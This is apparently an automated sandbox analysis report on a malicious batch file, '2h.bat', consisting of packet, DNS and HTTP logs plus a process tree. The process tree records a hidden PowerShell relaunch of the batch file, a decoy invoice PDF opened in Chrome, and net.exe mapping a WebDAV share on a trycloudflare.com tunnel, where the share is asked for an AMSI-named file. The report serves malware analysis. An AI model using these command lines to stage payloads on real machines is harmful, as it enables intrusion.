          Mar 24, 2025 15:51:19.954268932 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:19.956749916 CET49740443192.168.2.4142.251.40.196
          Mar 24, 2025 15:51:19.956868887 CET49740443192.168.2.4142.251.40.196
          Mar 24, 2025 15:51:19.956876993 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:20.171539068 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:20.172137976 CET49740443192.168.2.4142.251.40.196
          Mar 24, 2025 15:51:20.172164917 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:30.177586079 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:30.177737951 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:30.177969933 CET49740443192.168.2.4142.251.40.196
          Mar 24, 2025 15:51:31.804641962 CET49740443192.168.2.4142.251.40.196
          Mar 24, 2025 15:51:31.804682970 CET44349740142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:33.787131071 CET49708443192.168.2.452.113.196.254
          Mar 24, 2025 15:51:34.116301060 CET49709443192.168.2.4131.253.33.254
          TimestampSource PortDest PortSource IPDest IP
          Mar 24, 2025 15:50:14.769285917 CET5765353192.168.2.41.1.1.1
          Mar 24, 2025 15:50:14.879667997 CET53576531.1.1.1192.168.2.4
          Mar 24, 2025 15:50:15.758053064 CET5335053192.168.2.41.1.1.1
          Mar 24, 2025 15:50:15.762254953 CET5465853192.168.2.41.1.1.1
          Mar 24, 2025 15:50:15.860186100 CET53593811.1.1.1192.168.2.4
          Mar 24, 2025 15:50:15.873464108 CET53533501.1.1.1192.168.2.4
          Mar 24, 2025 15:50:15.874695063 CET53546581.1.1.1192.168.2.4
          Mar 24, 2025 15:50:15.972352028 CET53588151.1.1.1192.168.2.4
          Mar 24, 2025 15:50:16.833005905 CET53649271.1.1.1192.168.2.4
          Mar 24, 2025 15:50:19.895682096 CET5997153192.168.2.41.1.1.1
          Mar 24, 2025 15:50:19.896028996 CET6276353192.168.2.41.1.1.1
          Mar 24, 2025 15:50:20.000814915 CET53599711.1.1.1192.168.2.4
          Mar 24, 2025 15:50:20.002268076 CET53627631.1.1.1192.168.2.4
          Mar 24, 2025 15:50:31.817250013 CET5014953192.168.2.41.1.1.1
          Mar 24, 2025 15:50:31.921622992 CET53501491.1.1.1192.168.2.4
          Mar 24, 2025 15:50:33.751878977 CET53575091.1.1.1192.168.2.4
          Mar 24, 2025 15:50:48.724684000 CET4945553192.168.2.41.1.1.1
          Mar 24, 2025 15:50:48.883153915 CET53494551.1.1.1192.168.2.4
          Mar 24, 2025 15:50:48.979231119 CET138138192.168.2.4192.168.2.255
          Mar 24, 2025 15:50:52.688574076 CET53541111.1.1.1192.168.2.4
          Mar 24, 2025 15:51:07.693167925 CET6326453192.168.2.41.1.1.1
          Mar 24, 2025 15:51:07.806545019 CET53632641.1.1.1192.168.2.4
          Mar 24, 2025 15:51:15.050442934 CET53521401.1.1.1192.168.2.4
          Mar 24, 2025 15:51:15.196801901 CET53641781.1.1.1192.168.2.4
          Mar 24, 2025 15:51:17.910377979 CET53551261.1.1.1192.168.2.4
          Mar 24, 2025 15:51:18.674397945 CET53582051.1.1.1192.168.2.4
          Mar 24, 2025 15:51:27.802215099 CET4918253192.168.2.41.1.1.1
          Mar 24, 2025 15:51:27.911925077 CET53491821.1.1.1192.168.2.4
          Mar 24, 2025 15:51:47.027631044 CET53533541.1.1.1192.168.2.4
          TimestampSource IPDest IPChecksumCodeType
          Mar 24, 2025 15:51:45.045152903 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 24, 2025 15:50:14.769285917 CET192.168.2.41.1.1.10x2ccdStandard query (0)supplier-murray-custody-treasures.trycloudflare.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:15.758053064 CET192.168.2.41.1.1.10x6685Standard query (0)www.healyconsultants.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:15.762254953 CET192.168.2.41.1.1.10x9ce1Standard query (0)www.healyconsultants.com65IN (0x0001)false
          Mar 24, 2025 15:50:19.895682096 CET192.168.2.41.1.1.10xae50Standard query (0)www.google.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:19.896028996 CET192.168.2.41.1.1.10xcf18Standard query (0)www.google.com65IN (0x0001)false
          Mar 24, 2025 15:50:31.817250013 CET192.168.2.41.1.1.10x663eStandard query (0)supplier-murray-custody-treasures.trycloudflare.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:48.724684000 CET192.168.2.41.1.1.10x2b85Standard query (0)supplier-murray-custody-treasures.trycloudflare.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:07.693167925 CET192.168.2.41.1.1.10x3ceaStandard query (0)supplier-murray-custody-treasures.trycloudflare.comA (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:27.802215099 CET192.168.2.41.1.1.10x3ccdStandard query (0)supplier-murray-custody-treasures.trycloudflare.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 24, 2025 15:50:14.879667997 CET1.1.1.1192.168.2.40x2ccdNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:14.879667997 CET1.1.1.1192.168.2.40x2ccdNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:15.873464108 CET1.1.1.1192.168.2.40x6685No error (0)www.healyconsultants.comhealyconsultants.comCNAME (Canonical name)IN (0x0001)false
          Mar 24, 2025 15:50:15.873464108 CET1.1.1.1192.168.2.40x6685No error (0)healyconsultants.com162.159.134.42A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:15.874695063 CET1.1.1.1192.168.2.40x9ce1No error (0)www.healyconsultants.comhealyconsultants.comCNAME (Canonical name)IN (0x0001)false
          Mar 24, 2025 15:50:20.000814915 CET1.1.1.1192.168.2.40xae50No error (0)www.google.com142.251.40.196A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:20.002268076 CET1.1.1.1192.168.2.40xcf18No error (0)www.google.com65IN (0x0001)false
          Mar 24, 2025 15:50:31.921622992 CET1.1.1.1192.168.2.40x663eNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:31.921622992 CET1.1.1.1192.168.2.40x663eNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:48.883153915 CET1.1.1.1192.168.2.40x2b85No error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:50:48.883153915 CET1.1.1.1192.168.2.40x2b85No error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:07.806545019 CET1.1.1.1192.168.2.40x3ceaNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:07.806545019 CET1.1.1.1192.168.2.40x3ceaNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:27.911925077 CET1.1.1.1192.168.2.40x3ccdNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
          Mar 24, 2025 15:51:27.911925077 CET1.1.1.1192.168.2.40x3ccdNo error (0)supplier-murray-custody-treasures.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
          • c.pki.goog
          Session IDSource IPSource PortDestination IPDestination Port
          0192.168.2.449719142.250.64.9980
          TimestampBytes transferredDirectionData
          Mar 24, 2025 15:50:02.610291004 CET202OUTGET /r/gsr1.crl HTTP/1.1
          Cache-Control: max-age = 3000
          Connection: Keep-Alive
          Accept: */*
          If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
          User-Agent: Microsoft-CryptoAPI/10.0
          Host: c.pki.goog
          Mar 24, 2025 15:50:02.708606005 CET223INHTTP/1.1 304 Not Modified
          Date: Mon, 24 Mar 2025 14:23:27 GMT
          Expires: Mon, 24 Mar 2025 15:13:27 GMT
          Age: 1595
          Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
          Cache-Control: public, max-age=3000
          Vary: Accept-Encoding
          Mar 24, 2025 15:50:02.988513947 CET200OUTGET /r/r4.crl HTTP/1.1
          Cache-Control: max-age = 3000
          Connection: Keep-Alive
          Accept: */*
          If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
          User-Agent: Microsoft-CryptoAPI/10.0
          Host: c.pki.goog
          Mar 24, 2025 15:50:03.087635040 CET223INHTTP/1.1 304 Not Modified
          Date: Mon, 24 Mar 2025 14:23:30 GMT
          Expires: Mon, 24 Mar 2025 15:13:30 GMT
          Age: 1593
          Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
          Cache-Control: public, max-age=3000
          Vary: Accept-Encoding


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449722104.16.231.1324431424C:\Windows\System32\net.exe
          TimestampBytes transferredDirectionData
          2025-03-24 14:50:15 UTC140OUTOPTIONS / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: DavClnt
          translate: f
          Host: supplier-murray-custody-treasures.trycloudflare.com
          2025-03-24 14:50:15 UTC331INHTTP/1.1 200 OK
          Date: Mon, 24 Mar 2025 14:50:15 GMT
          Content-Type: text/html; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          CF-Ray: 9256fad80e825e78-EWR
          CF-Cache-Status: DYNAMIC
          Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
          dav: 1,2
          ms-author-via: DAV
          Server: cloudflare
          2025-03-24 14:50:15 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449733104.16.231.132443
          TimestampBytes transferredDirectionData
          2025-03-24 14:50:19 UTC200OUTOPTIONS /syscalls/amsi_trace32.amsi.csv HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
          translate: f
          Host: supplier-murray-custody-treasures.trycloudflare.com
          2025-03-24 14:50:20 UTC226INHTTP/1.1 404 Not Found
          Date: Mon, 24 Mar 2025 14:50:20 GMT
          Content-Type: text/html; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          CF-Ray: 9256faf3384ec64a-EWR
          CF-Cache-Status: DYNAMIC
          Server: cloudflare
          2025-03-24 14:50:20 UTC418INData Raw: 31 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34
          Data Ascii: 19b<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4
          2025-03-24 14:50:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Click to jump to process

          Click to jump to process

          • File
          • Registry

          Click to dive into process behavior distribution

          Target ID:4
          Start time:10:49:48
          Start date:24/03/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2h.bat" "
          Imagebase:0x7ff6cb660000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:10:49:48
          Start date:24/03/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff62fc20000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:7
          Start time:10:49:49
          Start date:24/03/2025
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\2h.bat\" hidden' -WindowStyle Hidden"
          Imagebase:0x7ff7016f0000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

          Target ID:9
          Start time:10:50:12
          Start date:24/03/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\2h.bat" hidden
          Imagebase:0x7ff6cb660000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

          Target ID:10
          Start time:10:50:12
          Start date:24/03/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff62fc20000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:11
          Start time:10:50:13
          Start date:24/03/2025
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
          Imagebase:0x7ff786830000
          File size:3'388'000 bytes
          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:12
          Start time:10:50:13
          Start date:24/03/2025
          Path:C:\Windows\System32\net.exe
          Wow64 process (32bit):false
          Commandline:net use Z: "\\supplier-murray-custody-treasures.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
          Imagebase:0x7ff65abe0000
          File size:59'904 bytes
          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

          Target ID:13
          Start time:10:50:13
          Start date:24/03/2025
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1852,i,15914125147527683270,510566878733152321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3
          Imagebase:0x7ff786830000
          File size:3'388'000 bytes
          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:17
          Start time:10:50:19
          Start date:24/03/2025
          Path:C:\Windows\System32\net.exe
          Wow64 process (32bit):false
          Commandline:net use Z: /delete /yes
          Imagebase:0x7ff65abe0000
          File size:59'904 bytes
          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly